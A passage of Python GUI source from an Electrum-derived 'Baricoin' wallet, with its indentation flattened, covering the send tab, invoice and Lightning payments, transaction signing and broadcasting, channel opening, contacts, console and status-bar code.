self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Baricoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Baricoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Baricoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
